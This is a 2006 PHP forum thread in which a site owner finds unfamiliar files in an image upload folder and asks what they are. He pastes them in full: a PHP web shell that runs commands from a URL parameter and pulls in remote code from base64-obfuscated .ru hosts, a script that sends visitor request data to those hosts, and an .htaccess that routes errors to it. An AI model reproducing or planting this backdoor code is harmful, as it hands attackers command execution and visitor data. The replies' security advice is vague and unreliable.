Jump to content


Photo

Weird Files Created!


  • Please log in to reply
6 replies to this topic

#1 pbjorge12

pbjorge12
  • Members
  • Pip
  • Newbie
  • 9 posts

Posted 01 July 2006 - 06:41 AM

Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Create.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

.htaccess
Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php

Note: Different file name's with different content were in eac folder...
Note2: The files were created by "nobody" the default apache user...

Is this normal? What is it? What is its purpose?

#2 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 06:49 AM

i dont know but i also got a .php files put in my folder one day and it outputted all my code within that folder.

scary?


Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#3 pbjorge12

pbjorge12
  • Members
  • Pip
  • Newbie
  • 9 posts

Posted 01 July 2006 - 06:59 AM

Its VERY scary...
If I don't get this figured out I'm gonna be up ALL night!

#4 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 07:08 AM

take away the [][] brackets to see the code larger ok
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#5 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 07:17 AM


if you find that you havent done any valadation on users uploading the correct file exstention then post the upload revelent code.

if you have done that read on!


ok you made me paranoid know what i did 5 min ago is cheek the phpmyadmin for any databases that i didnt no off being mine you should take these steps.

i had no extra ones thank god.

know what i understand is that if a hacker got your mysql deatails then they can use your database for there own needs and in some cases also use a folder you didnt know about but the best pratice is to cheeck the database entrys and if there all yours lol............... your ok you can sleep tonight ok.

but

in the worse sititation and a person has leached onto your database then you have to reset the passwords on all your scripts and database ok.

and then delete any unknown folders and files .

i would sugest a fresh copy of everthink ok.

scary good luck.
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#6 pbjorge12

pbjorge12
  • Members
  • Pip
  • Newbie
  • 9 posts

Posted 01 July 2006 - 07:27 AM

Well...After doing some reasearch this is an exploit that works with directories with 777 permissions (Which mine is).
I am still looking for a fix...

#7 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 08:34 AM

exsplain more what do you mead an exsploit


what they get in 777 folders how?

lol you make me more worried?
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users